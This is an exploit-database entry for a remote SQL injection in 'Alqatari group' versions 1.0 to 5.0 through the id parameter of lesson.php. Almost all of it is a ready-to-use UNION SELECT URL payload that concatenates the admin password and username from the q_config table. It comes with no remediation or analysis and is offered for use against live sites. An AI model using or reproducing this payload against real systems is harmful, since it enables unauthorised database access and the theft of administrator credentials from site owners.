id: 10119
date: 12/08/2009
title: Alqatari group Version 1.0 <= 5.0 (id) Remote SQL Injection Vulnerability
author: Red-D3v1L
cves: 

=========================================================================
Alqatari group Version 1.0 <= 5.0 (id) Remote SQL Injection Vulnerability
=========================================================================

########################################################################
 
===[ Exploit SQL ]=== 
 
 [?] [Path]/lesson.php?id=[SQL]
 
 [?] Live dem0 :
 
http://www.site.com/lesson.php?id=-258+union+select+concat%28c_pass,0x3e,c_user%29,2,3+from+q_config
 

 
###########################################################################



#  0day.today [2023-03-27]  #